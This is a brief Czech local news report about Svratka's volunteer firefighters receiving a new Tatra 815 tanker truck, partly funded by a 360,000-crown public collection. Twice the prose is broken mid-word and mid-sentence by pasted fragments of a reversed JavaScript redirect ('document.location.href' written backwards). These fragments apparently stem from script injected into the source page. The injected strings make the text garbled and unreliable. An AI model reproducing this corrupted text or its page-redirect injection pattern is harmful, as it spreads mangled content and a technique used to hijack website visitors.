Rainbow page separator

Hasiči dostali novou stříkačku, lidé na ni přispěli 360 tisíci

Neděle, 4. listopadu 2018

Svratka / Novou cisternovou au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilovou stříkačku (CAS) převzali svratečtí hasiči. Na Tatru 815 s náhonem na všechna čtyři kola za celkem 6,2 milionu korun prostřednictvím veřejné sbírky přispívali také jednotlivci i firmy.
„Vybraná částka 360 tisíc korun jasně hovoří za vše. Děkuji občanům Svratky, ale i některým chalupářům, zdejším firmám, firmě Žďas a sousední obci Křižánky,“ informoval starosta Svratky František Mládek.
Z celkové ceny stroje dál činí 2,5 milionu korun dotace z Fondu zábrany škod Ministerstva vnitra České republiky, půl milionu na stříkačku poskytne Kraj Vysočina a zbytek peněz pochází z rozpočtu Svratky, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně již zmíněných finančních prostředků z veřejné sbírky.
S převzetím nové techniky se zároveň lidé ve Svratce mohli rozloučit s trambusem zvaným Matýsek, který svratečtí hasiči dosud používali. „Jeho stáří je 35 let. Našim hasičům
věrně sloužil téměř jedenáct let a nyní bude plnit službu u dobrovolných hasičů v nedalekých Daňkovicích,“ dodal František Mládek.